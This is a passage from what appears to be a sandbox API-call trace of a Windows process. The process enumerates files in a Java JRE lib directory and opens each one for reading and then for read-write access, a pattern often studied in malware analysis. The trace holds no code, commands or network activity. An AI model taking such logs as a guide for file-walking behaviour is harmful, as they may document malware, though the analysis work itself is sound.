hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.683] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x64, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x75dd0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x64, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\c", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ై")) returned 0 [0094.683] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0094.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0094.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.684] AreFileApisANSI () returned 1 [0094.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties", lpUsedDefaultChar=0x0) returned 64 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.685] AreFileApisANSI () returned 1 [0094.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0094.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0094.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 64 [0094.685] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.685] GetFileType (hFile=0x360) returned 0x1 [0094.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0094.685] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.686] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.686] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.686] CloseHandle (hObject=0x360) returned 1 [0094.686] AreFileApisANSI () returned 1 [0094.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0094.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0094.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 64 [0094.686] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.686] GetFileType (hFile=0x360) returned 0x1 [0094.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0094.686] CloseHandle (hObject=0x360) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.688] AreFileApisANSI () returned 1 [0094.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0094.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties") returned 64 [0094.688] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac)) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.688] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x101a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="currency.data", cAlternateFileName="CURREN~1.DAT")) returned 1 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69e30 [0094.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0094.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0094.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0094.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0094.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.689] AreFileApisANSI () returned 1 [0094.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data", lpUsedDefaultChar=0x0) returned 53 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.689] AreFileApisANSI () returned 1 [0094.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0094.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 53 [0094.689] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.690] GetFileType (hFile=0x360) returned 0x1 [0094.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0094.690] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.690] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.690] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.690] CloseHandle (hObject=0x360) returned 1 [0094.690] AreFileApisANSI () returned 1 [0094.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0094.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 53 [0094.690] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.691] GetFileType (hFile=0x360) returned 0x1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0094.691] CloseHandle (hObject=0x360) returned 1 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 